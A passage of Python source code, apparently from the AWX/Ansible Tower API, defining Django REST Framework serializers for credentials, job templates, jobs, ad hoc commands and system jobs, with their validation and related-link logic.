.filter(id__in=direct_permissive_role_ids).all()\n\n direct_team_roles = Role.objects \\\n .filter(content_type=team_content_type,\n members=user,\n children__in=direct_permissive_role_ids)\n if content_type == team_content_type:\n # When looking at the access list for a team, exclude the entries\n # for that team. This exists primarily so we don't list the read role\n # as a direct role when a user is a member or admin of a team\n direct_team_roles = direct_team_roles.exclude(\n children__content_type=team_content_type,\n children__object_id=obj.id\n )\n\n\n indirect_team_roles = Role.objects \\\n .filter(content_type=team_content_type,\n members=user,\n children__in=all_permissive_role_ids) \\\n .exclude(id__in=direct_team_roles)\n\n indirect_access_roles = user.roles \\\n .filter(id__in=all_permissive_role_ids) \\\n .exclude(id__in=direct_permissive_role_ids) \\\n .exclude(id__in=direct_team_roles) \\\n .exclude(id__in=indirect_team_roles)\n\n ret['summary_fields']['direct_access'] \\\n = [format_role_perm(r) for r in direct_access_roles.distinct()] \\\n + [y for x in (format_team_role_perm(r, direct_permissive_role_ids) for r in direct_team_roles.distinct()) for y in x] \\\n + [y for x in (format_team_role_perm(r, all_permissive_role_ids) for r in indirect_team_roles.distinct()) for y in x]\n\n ret['summary_fields']['indirect_access'] \\\n = [format_role_perm(r) for r in indirect_access_roles.distinct()]\n\n return ret\n\n\nclass CredentialTypeSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete']\n managed_by_tower = serializers.ReadOnlyField()\n\n class Meta:\n model = CredentialType\n fields = ('*', 'kind', 'namespace', 'name', 'managed_by_tower', 'inputs',\n 'injectors')\n\n def validate(self, attrs):\n if self.instance and self.instance.managed_by_tower:\n raise PermissionDenied(\n detail=_(\"Modifications not allowed for managed credential types\")\n )\n if self.instance and self.instance.credentials.exists():\n if 'inputs' in attrs and attrs['inputs'] != self.instance.inputs:\n raise PermissionDenied(\n detail= _(\"Modifications to inputs are not allowed for credential types that are in use\")\n )\n ret = super(CredentialTypeSerializer, self).validate(attrs)\n\n if 'kind' in attrs and attrs['kind'] not in ('cloud', 'net'):\n raise serializers.ValidationError({\n \"kind\": _(\"Must be 'cloud' or 'net', not %s\") % attrs['kind']\n })\n\n fields = attrs.get('inputs', {}).get('fields', [])\n for field in fields:\n if field.get('ask_at_runtime', False):\n raise serializers.ValidationError({\"inputs\": _(\"'ask_at_runtime' is not supported for custom credentials.\")})\n\n return ret\n\n def get_related(self, obj):\n res = super(CredentialTypeSerializer, self).get_related(obj)\n res['credentials'] = self.reverse(\n 'api:credential_type_credential_list',\n kwargs={'pk': obj.pk}\n )\n res['activity_stream'] = self.reverse(\n 'api:credential_type_activity_stream_list',\n kwargs={'pk': obj.pk}\n )\n return res\n\n def to_representation(self, data):\n value = super(CredentialTypeSerializer, self).to_representation(data)\n\n # translate labels and help_text for credential fields \"managed by Tower\"\n if value.get('managed_by_tower'):\n value['name'] = _(value['name'])\n for field in value.get('inputs', {}).get('fields', []):\n field['label'] = _(field['label'])\n if 'help_text' in field:\n field['help_text'] = _(field['help_text'])\n return value\n\n def filter_field_metadata(self, fields, method):\n # API-created/modified CredentialType kinds are limited to\n # `cloud` and `net`\n if method in ('PUT', 'POST'):\n fields['kind']['choices'] = list(filter(\n lambda choice: choice[0] in ('cloud', 'net'),\n fields['kind']['choices']\n ))\n return fields\n\n\nclass CredentialSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete', 'copy', 'use']\n capabilities_prefetch = ['admin', 'use']\n\n class Meta:\n model = Credential\n fields = ('*', 'organization', 'credential_type', 'inputs', 'kind', 'cloud')\n extra_kwargs = {\n 'credential_type': {\n 'label': _('Credential Type'),\n },\n }\n\n def to_representation(self, data):\n value = super(CredentialSerializer, self).to_representation(data)\n\n if 'inputs' in value:\n value['inputs'] = data.display_inputs()\n return value\n\n def get_related(self, obj):\n res = super(CredentialSerializer, self).get_related(obj)\n\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n\n res.update(dict(\n activity_stream = self.reverse('api:credential_activity_stream_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:credential_access_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:credential_object_roles_list', kwargs={'pk': obj.pk}),\n owner_users = self.reverse('api:credential_owner_users_list', kwargs={'pk': obj.pk}),\n owner_teams = self.reverse('api:credential_owner_teams_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:credential_copy', kwargs={'pk': obj.pk}),\n input_sources = self.reverse('api:credential_input_source_sublist', kwargs={'pk': obj.pk}),\n credential_type = self.reverse('api:credential_type_detail', kwargs={'pk': obj.credential_type.pk}),\n ))\n\n parents = [role for role in obj.admin_role.parents.all() if role.object_id is not None]\n if parents:\n res.update({parents[0].content_type.name:parents[0].content_object.get_absolute_url(self.context.get('request'))})\n elif len(obj.admin_role.members.all()) > 0:\n user = obj.admin_role.members.all()[0]\n res.update({'user': self.reverse('api:user_detail', kwargs={'pk': user.pk})})\n\n return res\n\n def get_summary_fields(self, obj):\n summary_dict = super(CredentialSerializer, self).get_summary_fields(obj)\n summary_dict['owners'] = []\n\n for user in obj.admin_role.members.all():\n summary_dict['owners'].append({\n 'id': user.pk,\n 'type': 'user',\n 'name': user.username,\n 'description': ' '.join([user.first_name, user.last_name]),\n 'url': self.reverse('api:user_detail', kwargs={'pk': user.pk}),\n })\n\n for parent in [role for role in obj.admin_role.parents.all() if role.object_id is not None]:\n summary_dict['owners'].append({\n 'id': parent.content_object.pk,\n 'type': camelcase_to_underscore(parent.content_object.__class__.__name__),\n 'name': parent.content_object.name,\n 'description': parent.content_object.description,\n 'url': parent.content_object.get_absolute_url(self.context.get('request')),\n })\n\n return summary_dict\n\n def get_validation_exclusions(self, obj=None):\n ret = super(CredentialSerializer, self).get_validation_exclusions(obj)\n for field in ('credential_type', 'inputs'):\n if field in ret:\n ret.remove(field)\n return ret\n\n def validate_credential_type(self, credential_type):\n if self.instance and credential_type.pk != self.instance.credential_type.pk:\n for rel in (\n 'ad_hoc_commands',\n 'insights_inventories',\n 'unifiedjobs',\n 'unifiedjobtemplates',\n 'projects',\n 'projectupdates',\n 'workflowjobnodes'\n ):\n if getattr(self.instance, rel).count() > 0:\n raise ValidationError(\n _('You cannot change the credential type of the credential, as it may break the functionality'\n ' of the resources using it.'),\n )\n\n return credential_type\n\n\nclass CredentialSerializerCreate(CredentialSerializer):\n\n user = serializers.PrimaryKeyRelatedField(\n queryset=User.objects.all(),\n required=False, default=None, write_only=True, allow_null=True,\n help_text=_('Write-only field used to add user to owner role. If provided, '\n 'do not give either team or organization. Only valid for creation.'))\n team = serializers.PrimaryKeyRelatedField(\n queryset=Team.objects.all(),\n required=False, default=None, write_only=True, allow_null=True,\n help_text=_('Write-only field used to add team to owner role. If provided, '\n 'do not give either user or organization. Only valid for creation.'))\n organization = serializers.PrimaryKeyRelatedField(\n queryset=Organization.objects.all(),\n required=False, default=None, allow_null=True,\n help_text=_('Inherit permissions from organization roles. If provided on creation, '\n 'do not give either user or team.'))\n\n class Meta:\n model = Credential\n fields = ('*', 'user', 'team')\n\n def validate(self, attrs):\n owner_fields = set()\n for field in ('user', 'team', 'organization'):\n if field in attrs:\n if attrs[field]:\n owner_fields.add(field)\n else:\n attrs.pop(field)\n if not owner_fields:\n raise serializers.ValidationError({\"detail\": _(\"Missing 'user', 'team', or 'organization'.\")})\n\n if attrs.get('team'):\n attrs['organization'] = attrs['team'].organization\n\n return super(CredentialSerializerCreate, self).validate(attrs)\n\n def create(self, validated_data):\n user = validated_data.pop('user', None)\n team = validated_data.pop('team', None)\n\n credential = super(CredentialSerializerCreate, self).create(validated_data)\n\n if user:\n credential.admin_role.members.add(user)\n if team:\n if not credential.organization or team.organization.id != credential.organization.id:\n raise serializers.ValidationError({\"detail\": _(\"Credential organization must be set and match before assigning to a team\")})\n credential.admin_role.parents.add(team.admin_role)\n credential.use_role.parents.add(team.member_role)\n return credential\n\n\nclass CredentialInputSourceSerializer(BaseSerializer):\n show_capabilities = ['delete']\n\n class Meta:\n model = CredentialInputSource\n fields = (\n '*',\n 'input_field_name',\n 'metadata',\n 'target_credential',\n 'source_credential',\n '-name',\n )\n extra_kwargs = {\n 'input_field_name': {'required': True},\n 'target_credential': {'required': True},\n 'source_credential': {'required': True},\n }\n\n def get_related(self, obj):\n res = super(CredentialInputSourceSerializer, self).get_related(obj)\n res['source_credential'] = obj.source_credential.get_absolute_url(request=self.context.get('request'))\n res['target_credential'] = obj.target_credential.get_absolute_url(request=self.context.get('request'))\n return res\n\n\nclass UserCredentialSerializerCreate(CredentialSerializerCreate):\n\n class Meta:\n model = Credential\n fields = ('*', '-team', '-organization')\n\n\nclass TeamCredentialSerializerCreate(CredentialSerializerCreate):\n\n class Meta:\n model = Credential\n fields = ('*', '-user', '-organization')\n\n\nclass OrganizationCredentialSerializerCreate(CredentialSerializerCreate):\n\n class Meta:\n model = Credential\n fields = ('*', '-user', '-team')\n\n\nclass LabelsListMixin(object):\n\n def _summary_field_labels(self, obj):\n label_list = [{'id': x.id, 'name': x.name} for x in obj.labels.all()[:10]]\n if has_model_field_prefetched(obj, 'labels'):\n label_ct = len(obj.labels.all())\n else:\n if len(label_list) < 10:\n label_ct = len(label_list)\n else:\n label_ct = obj.labels.count()\n return {'count': label_ct, 'results': label_list}\n\n def get_summary_fields(self, obj):\n res = super(LabelsListMixin, self).get_summary_fields(obj)\n res['labels'] = self._summary_field_labels(obj)\n return res\n\n\nclass JobOptionsSerializer(LabelsListMixin, BaseSerializer):\n\n class Meta:\n fields = ('*', 'job_type', 'inventory', 'project', 'playbook',\n 'forks', 'limit', 'verbosity', 'extra_vars', 'job_tags',\n 'force_handlers', 'skip_tags', 'start_at_task', 'timeout',\n 'use_fact_cache',)\n\n def get_related(self, obj):\n res = super(JobOptionsSerializer, self).get_related(obj)\n res['labels'] = self.reverse('api:job_template_label_list', kwargs={'pk': obj.pk})\n try:\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n except ObjectDoesNotExist:\n setattr(obj, 'inventory', None)\n try:\n if obj.project:\n res['project'] = self.reverse('api:project_detail', kwargs={'pk': obj.project.pk})\n except ObjectDoesNotExist:\n setattr(obj, 'project', None)\n if isinstance(obj, UnifiedJobTemplate):\n res['extra_credentials'] = self.reverse(\n 'api:job_template_extra_credentials_list',\n kwargs={'pk': obj.pk}\n )\n res['credentials'] = self.reverse(\n 'api:job_template_credentials_list',\n kwargs={'pk': obj.pk}\n )\n elif isinstance(obj, UnifiedJob):\n res['extra_credentials'] = self.reverse('api:job_extra_credentials_list', kwargs={'pk': obj.pk})\n res['credentials'] = self.reverse('api:job_credentials_list', kwargs={'pk': obj.pk})\n\n return res\n\n def to_representation(self, obj):\n ret = super(JobOptionsSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'inventory' in ret and not obj.inventory:\n ret['inventory'] = None\n if 'project' in ret and not obj.project:\n ret['project'] = None\n if 'playbook' in ret:\n ret['playbook'] = ''\n return ret\n\n def validate(self, attrs):\n if 'project' in self.fields and 'playbook' in self.fields:\n project = attrs.get('project', self.instance and self.instance.project or None)\n playbook = attrs.get('playbook', self.instance and self.instance.playbook or '')\n if not project:\n raise serializers.ValidationError({'project': _('This field is required.')})\n if project and project.scm_type and playbook and force_text(playbook) not in project.playbook_files:\n raise serializers.ValidationError({'playbook': _('Playbook not found for project.')})\n if project and not project.scm_type and playbook and force_text(playbook) not in project.playbooks:\n raise serializers.ValidationError({'playbook': _('Playbook not found for project.')})\n if project and not playbook:\n raise serializers.ValidationError({'playbook': _('Must select playbook for project.')})\n\n ret = super(JobOptionsSerializer, self).validate(attrs)\n return ret\n\n\nclass JobTemplateMixin(object):\n '''\n Provide recent jobs and survey details in summary_fields\n '''\n\n def _recent_jobs(self, obj):\n # Exclude \"joblets\", jobs that ran as part of a sliced workflow job\n uj_qs = obj.unifiedjob_unified_jobs.exclude(job__job_slice_count__gt=1).order_by('-created')\n # Would like to apply an .only, but does not play well with non_polymorphic\n # .only('id', 'status', 'finished', 'polymorphic_ctype_id')\n optimized_qs = uj_qs.non_polymorphic()\n return [{\n 'id': x.id, 'status': x.status, 'finished': x.finished,\n # Make type consistent with API top-level key, for instance workflow_job\n 'type': x.get_real_instance_class()._meta.verbose_name.replace(' ', '_')\n } for x in optimized_qs[:10]]\n\n def get_summary_fields(self, obj):\n d = super(JobTemplateMixin, self).get_summary_fields(obj)\n if obj.survey_spec is not None and ('name' in obj.survey_spec and 'description' in obj.survey_spec):\n d['survey'] = dict(title=obj.survey_spec['name'], description=obj.survey_spec['description'])\n d['recent_jobs'] = self._recent_jobs(obj)\n return d\n\n\nclass JobTemplateSerializer(JobTemplateMixin, UnifiedJobTemplateSerializer, JobOptionsSerializer):\n show_capabilities = ['start', 'schedule', 'copy', 'edit', 'delete']\n capabilities_prefetch = [\n 'admin', 'execute',\n {'copy': ['project.use', 'inventory.use']}\n ]\n\n status = serializers.ChoiceField(choices=JobTemplate.JOB_TEMPLATE_STATUS_CHOICES, read_only=True, required=False)\n\n class Meta:\n model = JobTemplate\n fields = ('*', 'host_config_key', 'ask_diff_mode_on_launch', 'ask_variables_on_launch', 'ask_limit_on_launch', 'ask_tags_on_launch',\n 'ask_skip_tags_on_launch', 'ask_job_type_on_launch', 'ask_verbosity_on_launch', 'ask_inventory_on_launch',\n 'ask_credential_on_launch', 'survey_enabled', 'become_enabled', 'diff_mode',\n 'allow_simultaneous', 'custom_virtualenv', 'job_slice_count')\n\n def get_related(self, obj):\n res = super(JobTemplateSerializer, self).get_related(obj)\n res.update(dict(\n jobs = self.reverse('api:job_template_jobs_list', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:job_template_schedules_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:job_template_activity_stream_list', kwargs={'pk': obj.pk}),\n launch = self.reverse('api:job_template_launch', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:job_template_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:job_template_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:job_template_notification_templates_error_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:job_template_access_list', kwargs={'pk': obj.pk}),\n survey_spec = self.reverse('api:job_template_survey_spec', kwargs={'pk': obj.pk}),\n labels = self.reverse('api:job_template_label_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:job_template_object_roles_list', kwargs={'pk': obj.pk}),\n instance_groups = self.reverse('api:job_template_instance_groups_list', kwargs={'pk': obj.pk}),\n slice_workflow_jobs = self.reverse('api:job_template_slice_workflow_jobs_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:job_template_copy', kwargs={'pk': obj.pk}),\n ))\n if obj.host_config_key:\n res['callback'] = self.reverse('api:job_template_callback', kwargs={'pk': obj.pk})\n return res\n\n def validate(self, attrs):\n def get_field_from_model_or_attrs(fd):\n return attrs.get(fd, self.instance and getattr(self.instance, fd) or None)\n\n inventory = get_field_from_model_or_attrs('inventory')\n project = get_field_from_model_or_attrs('project')\n\n if get_field_from_model_or_attrs('host_config_key') and not inventory:\n raise serializers.ValidationError({'host_config_key': _(\n \"Cannot enable provisioning callback without an inventory set.\"\n )})\n\n prompting_error_message = _(\"Must either set a default value or ask to prompt on launch.\")\n if project is None:\n raise serializers.ValidationError({'project': _(\"Job Templates must have a project assigned.\")})\n elif inventory is None and not get_field_from_model_or_attrs('ask_inventory_on_launch'):\n raise serializers.ValidationError({'inventory': prompting_error_message})\n\n return super(JobTemplateSerializer, self).validate(attrs)\n\n def validate_extra_vars(self, value):\n return vars_validate_or_raise(value)\n\n\n def get_summary_fields(self, obj):\n summary_fields = super(JobTemplateSerializer, self).get_summary_fields(obj)\n all_creds = []\n # Organize credential data into multitude of deprecated fields\n extra_creds = []\n if obj.pk:\n for cred in obj.credentials.all():\n summarized_cred = {\n 'id': cred.pk,\n 'name': cred.name,\n 'description': cred.description,\n 'kind': cred.kind,\n 'cloud': cred.credential_type.kind == 'cloud'\n }\n all_creds.append(summarized_cred)\n if cred.credential_type.kind in ('cloud', 'net'):\n extra_creds.append(summarized_cred)\n if self.is_detail_view:\n summary_fields['extra_credentials'] = extra_creds\n summary_fields['credentials'] = all_creds\n return summary_fields\n\n\nclass JobTemplateWithSpecSerializer(JobTemplateSerializer):\n '''\n Used for activity stream entries.\n '''\n\n class Meta:\n model = JobTemplate\n fields = ('*', 'survey_spec')\n\n\nclass JobSerializer(UnifiedJobSerializer, JobOptionsSerializer):\n\n passwords_needed_to_start = serializers.ReadOnlyField()\n artifacts = serializers.SerializerMethodField()\n\n class Meta:\n model = Job\n fields = ('*', 'job_template', 'passwords_needed_to_start',\n 'allow_simultaneous', 'artifacts', 'scm_revision',\n 'instance_group', 'diff_mode', 'job_slice_number', 'job_slice_count')\n\n def get_related(self, obj):\n res = super(JobSerializer, self).get_related(obj)\n res.update(dict(\n job_events = self.reverse('api:job_job_events_list', kwargs={'pk': obj.pk}),\n job_host_summaries = self.reverse('api:job_job_host_summaries_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:job_activity_stream_list', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:job_notifications_list', kwargs={'pk': obj.pk}),\n labels = self.reverse('api:job_label_list', kwargs={'pk': obj.pk}),\n create_schedule = self.reverse('api:job_create_schedule', kwargs={'pk': obj.pk}),\n ))\n try:\n if obj.job_template:\n res['job_template'] = self.reverse('api:job_template_detail',\n kwargs={'pk': obj.job_template.pk})\n except ObjectDoesNotExist:\n setattr(obj, 'job_template', None)\n if obj.can_cancel or True:\n res['cancel'] = self.reverse('api:job_cancel', kwargs={'pk': obj.pk})\n try:\n if obj.project_update:\n res['project_update'] = self.reverse(\n 'api:project_update_detail', kwargs={'pk': obj.project_update.pk}\n )\n except ObjectDoesNotExist:\n pass\n res['relaunch'] = self.reverse('api:job_relaunch', kwargs={'pk': obj.pk})\n return res\n\n def get_artifacts(self, obj):\n if obj:\n return obj.display_artifacts()\n return {}\n\n def to_internal_value(self, data):\n # When creating a new job and a job template is specified, populate any\n # fields not provided in data from the job template.\n if not self.instance and isinstance(data, dict) and data.get('job_template', False):\n try:\n job_template = JobTemplate.objects.get(pk=data['job_template'])\n except JobTemplate.DoesNotExist:\n raise serializers.ValidationError({'job_template': _('Invalid job template.')})\n data.setdefault('name', job_template.name)\n data.setdefault('description', job_template.description)\n data.setdefault('job_type', job_template.job_type)\n if job_template.inventory:\n data.setdefault('inventory', job_template.inventory.pk)\n if job_template.project:\n data.setdefault('project', job_template.project.pk)\n data.setdefault('playbook', job_template.playbook)\n if job_template.credential:\n data.setdefault('credential', job_template.credential)\n data.setdefault('forks', job_template.forks)\n data.setdefault('limit', job_template.limit)\n data.setdefault('verbosity', job_template.verbosity)\n data.setdefault('extra_vars', job_template.extra_vars)\n data.setdefault('job_tags', job_template.job_tags)\n data.setdefault('force_handlers', job_template.force_handlers)\n data.setdefault('skip_tags', job_template.skip_tags)\n data.setdefault('start_at_task', job_template.start_at_task)\n return super(JobSerializer, self).to_internal_value(data)\n\n def to_representation(self, obj):\n ret = super(JobSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'job_template' in ret and not obj.job_template:\n ret['job_template'] = None\n if 'extra_vars' in ret:\n ret['extra_vars'] = obj.display_extra_vars()\n return ret\n\n def get_summary_fields(self, obj):\n summary_fields = super(JobSerializer, self).get_summary_fields(obj)\n all_creds = []\n # Organize credential data into multitude of deprecated fields\n extra_creds = []\n if obj.pk:\n for cred in obj.credentials.all():\n summarized_cred = {\n 'id': cred.pk,\n 'name': cred.name,\n 'description': cred.description,\n 'kind': cred.kind,\n 'cloud': cred.credential_type.kind == 'cloud'\n }\n all_creds.append(summarized_cred)\n if cred.credential_type.kind in ('cloud', 'net'):\n extra_creds.append(summarized_cred)\n if self.is_detail_view:\n summary_fields['extra_credentials'] = extra_creds\n summary_fields['credentials'] = all_creds\n return summary_fields\n\n\nclass JobDetailSerializer(JobSerializer):\n\n host_status_counts = serializers.SerializerMethodField(\n help_text=_('A count of hosts uniquely assigned to each status.'),\n )\n playbook_counts = serializers.SerializerMethodField(\n help_text=_('A count of all plays and tasks for the job run.'),\n )\n custom_virtualenv = serializers.ReadOnlyField()\n\n class Meta:\n model = Job\n fields = ('*', 'host_status_counts', 'playbook_counts', 'custom_virtualenv')\n\n def get_playbook_counts(self, obj):\n task_count = obj.job_events.filter(event='playbook_on_task_start').count()\n play_count = obj.job_events.filter(event='playbook_on_play_start').count()\n\n data = {'play_count': play_count, 'task_count': task_count}\n\n return data\n\n def get_host_status_counts(self, obj):\n try:\n counts = obj.job_events.only('event_data').get(event='playbook_on_stats').get_host_status_counts()\n except JobEvent.DoesNotExist:\n counts = {}\n\n return counts\n\n\nclass JobCancelSerializer(BaseSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n model = Job\n fields = ('can_cancel',)\n\n\nclass JobRelaunchSerializer(BaseSerializer):\n\n passwords_needed_to_start = serializers.SerializerMethodField()\n retry_counts = serializers.SerializerMethodField()\n hosts = serializers.ChoiceField(\n required=False, allow_null=True, default='all',\n choices=[\n ('all', _('No change to job limit')),\n ('failed', _('All failed and unreachable hosts'))\n ],\n write_only=True\n )\n credential_passwords = VerbatimField(required=True, write_only=True)\n\n class Meta:\n model = Job\n fields = ('passwords_needed_to_start', 'retry_counts', 'hosts', 'credential_passwords',)\n\n def validate_credential_passwords(self, value):\n pnts = self.instance.passwords_needed_to_start\n missing = set(pnts) - set(key for key in value if value[key])\n if missing:\n raise serializers.ValidationError(_(\n 'Missing passwords needed to start: {}'.format(', '.join(missing))\n ))\n return value\n\n def to_representation(self, obj):\n res = super(JobRelaunchSerializer, self).to_representation(obj)\n view = self.context.get('view', None)\n if hasattr(view, '_raw_data_form_marker'):\n password_keys = dict([(p, u'') for p in self.get_passwords_needed_to_start(obj)])\n res.update(password_keys)\n return res\n\n def get_passwords_needed_to_start(self, obj):\n if obj:\n return obj.passwords_needed_to_start\n return ''\n\n def get_retry_counts(self, obj):\n if obj.status in ACTIVE_STATES:\n return _('Relaunch by host status not available until job finishes running.')\n data = OrderedDict([])\n for status in self.fields['hosts'].choices.keys():\n data[status] = obj.retry_qs(status).count()\n return data\n\n def get_validation_exclusions(self, *args, **kwargs):\n r = super(JobRelaunchSerializer, self).get_validation_exclusions(*args, **kwargs)\n r.append('credential_passwords')\n return r\n\n def validate(self, attrs):\n obj = self.instance\n if obj.project is None:\n raise serializers.ValidationError(dict(errors=[_(\"Job Template Project is missing or undefined.\")]))\n if obj.inventory is None or obj.inventory.pending_deletion:\n raise serializers.ValidationError(dict(errors=[_(\"Job Template Inventory is missing or undefined.\")]))\n attrs = super(JobRelaunchSerializer, self).validate(attrs)\n return attrs\n\n\nclass JobCreateScheduleSerializer(BaseSerializer):\n\n can_schedule = serializers.SerializerMethodField()\n prompts = serializers.SerializerMethodField()\n\n class Meta:\n model = Job\n fields = ('can_schedule', 'prompts',)\n\n def get_can_schedule(self, obj):\n '''\n Need both a job template and job prompts to schedule\n '''\n return obj.can_schedule\n\n @staticmethod\n def _summarize(res_name, obj):\n summary = {}\n for field in SUMMARIZABLE_FK_FIELDS[res_name]:\n summary[field] = getattr(obj, field, None)\n return summary\n\n def get_prompts(self, obj):\n try:\n config = obj.launch_config\n ret = config.prompts_dict(display=True)\n if 'inventory' in ret:\n ret['inventory'] = self._summarize('inventory', ret['inventory'])\n if 'credentials' in ret:\n all_creds = [self._summarize('credential', cred) for cred in ret['credentials']]\n ret['credentials'] = all_creds\n return ret\n except JobLaunchConfig.DoesNotExist:\n return {'all': _('Unknown, job may have been ran before launch configurations were saved.')}\n\n\nclass AdHocCommandSerializer(UnifiedJobSerializer):\n\n class Meta:\n model = AdHocCommand\n fields = ('*', 'job_type', 'inventory', 'limit', 'credential',\n 'module_name', 'module_args', 'forks', 'verbosity', 'extra_vars',\n 'become_enabled', 'diff_mode', '-unified_job_template', '-description')\n extra_kwargs = {\n 'name': {\n 'read_only': True,\n },\n }\n\n def get_field_names(self, declared_fields, info):\n field_names = super(AdHocCommandSerializer, self).get_field_names(declared_fields, info)\n # Meta multiple inheritance and -field_name options don't seem to be\n # taking effect above, so remove the undesired fields here.\n return tuple(x for x in field_names if x not in ('unified_job_template', 'description'))\n\n def build_standard_field(self, field_name, model_field):\n field_class, field_kwargs = super(AdHocCommandSerializer, self).build_standard_field(field_name, model_field)\n # Load module name choices dynamically from DB settings.\n if field_name == 'module_name':\n field_class = serializers.ChoiceField\n module_name_choices = [(x, x) for x in settings.AD_HOC_COMMANDS]\n module_name_default = 'command' if 'command' in [x[0] for x in module_name_choices] else ''\n field_kwargs['choices'] = module_name_choices\n field_kwargs['required'] = bool(not module_name_default)\n field_kwargs['default'] = module_name_default or serializers.empty\n field_kwargs['allow_blank'] = bool(module_name_default)\n field_kwargs.pop('max_length', None)\n return field_class, field_kwargs\n\n def get_related(self, obj):\n res = super(AdHocCommandSerializer, self).get_related(obj)\n if obj.inventory_id:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory_id})\n if obj.credential_id:\n res['credential'] = self.reverse('api:credential_detail', kwargs={'pk': obj.credential_id})\n res.update(dict(\n events = self.reverse('api:ad_hoc_command_ad_hoc_command_events_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:ad_hoc_command_activity_stream_list', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:ad_hoc_command_notifications_list', kwargs={'pk': obj.pk}),\n ))\n res['cancel'] = self.reverse('api:ad_hoc_command_cancel', kwargs={'pk': obj.pk})\n res['relaunch'] = self.reverse('api:ad_hoc_command_relaunch', kwargs={'pk': obj.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(AdHocCommandSerializer, self).to_representation(obj)\n if 'inventory' in ret and not obj.inventory_id:\n ret['inventory'] = None\n if 'credential' in ret and not obj.credential_id:\n ret['credential'] = None\n # For the UI, only module_name is returned for name, instead of the\n # longer module name + module_args format.\n if 'name' in ret:\n ret['name'] = obj.module_name\n return ret\n\n def validate(self, attrs):\n ret = super(AdHocCommandSerializer, self).validate(attrs)\n return ret\n\n def validate_extra_vars(self, value):\n redacted_extra_vars, removed_vars = extract_ansible_vars(value)\n if removed_vars:\n raise serializers.ValidationError(_(\n \"{} are prohibited from use in ad hoc commands.\"\n ).format(\", \".join(sorted(removed_vars, reverse=True))))\n return vars_validate_or_raise(value)\n\n\nclass AdHocCommandDetailSerializer(AdHocCommandSerializer):\n\n host_status_counts = serializers.SerializerMethodField(\n help_text=_('A count of hosts uniquely assigned to each status.'),\n )\n\n class Meta:\n model = AdHocCommand\n fields = ('*', 'host_status_counts',)\n\n def get_host_status_counts(self, obj):\n try:\n counts = obj.ad_hoc_command_events.only('event_data').get(event='playbook_on_stats').get_host_status_counts()\n except AdHocCommandEvent.DoesNotExist:\n counts = {}\n\n return counts\n\n\nclass AdHocCommandCancelSerializer(AdHocCommandSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass AdHocCommandRelaunchSerializer(AdHocCommandSerializer):\n\n class Meta:\n fields = ()\n\n def to_representation(self, obj):\n if obj:\n return dict([(p, u'') for p in obj.passwords_needed_to_start])\n else:\n return {}\n\n\nclass SystemJobTemplateSerializer(UnifiedJobTemplateSerializer):\n\n class Meta:\n model = SystemJobTemplate\n fields = ('*', 'job_type',)\n\n def get_related(self, obj):\n res = super(SystemJobTemplateSerializer, self).get_related(obj)\n res.update(dict(\n jobs = self.reverse('api:system_job_template_jobs_list', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:system_job_template_schedules_list', kwargs={'pk': obj.pk}),\n launch = self.reverse('api:system_job_template_launch', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:system_job_template_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:system_job_template_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:system_job_template_notification_templates_error_list', kwargs={'pk': obj.pk}),\n\n ))\n return res\n\n\nclass SystemJobSerializer(UnifiedJobSerializer):\n\n result_stdout = serializers.SerializerMethodField()\n\n class Meta:\n model = SystemJob\n fields = ('*', 'system_job_template', 'job_type', 'extra_vars', 'result_stdout', '-controller_node',)\n\n def get_related(self, obj):\n res = super(SystemJobSerializer, self).get_related(obj)\n if obj.system_job_template:\n res['system_job_template'] = self.reverse('api:system_job_template_detail',\n kwargs={'pk': obj.system_job_template.pk})\n res['notifications'] = self.reverse('api:system_job_notifications_list', kwargs={'pk': obj.pk})\n if obj.can_cancel or True:\n res['cancel'] = self.reverse('api:system_job_cancel', kwargs={'pk': obj.pk})\n res['events'] = self.reverse('api:system_job_events_list', kwargs={'pk': obj.pk})\n return res\n\n def get_result_stdout(self, obj):\n try:\n return obj.result_stdout\n except StdoutMaxBytesExceeded as e:\n return _(\n \"Standard Output too large to display ({text_size} bytes), \"\n \"only download supported for sizes over {supported_size} bytes.\").format(\n text_size=e.total, supported_size=e.supported\n )\n\n\nclass SystemJobCancelSerializer(SystemJobSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass WorkflowJobTemplateSerializer(JobTemplateMixin, LabelsListMixin, UnifiedJobTemplateSerializer):\n show_capabilities = ['start', 'schedule', 'edit', 'copy', 'delete']\n capabilities_prefetch = [\n 'admin', 'execute',\n {'copy': 'organization.workflow_admin'}\n ]\n\n class Meta:\n model = WorkflowJobTemplate\n fields = ('*', 'extra_vars', 'organization', 'survey_enabled', 'allow_simultaneous',\n 'ask_variables_on_launch', 'inventory', 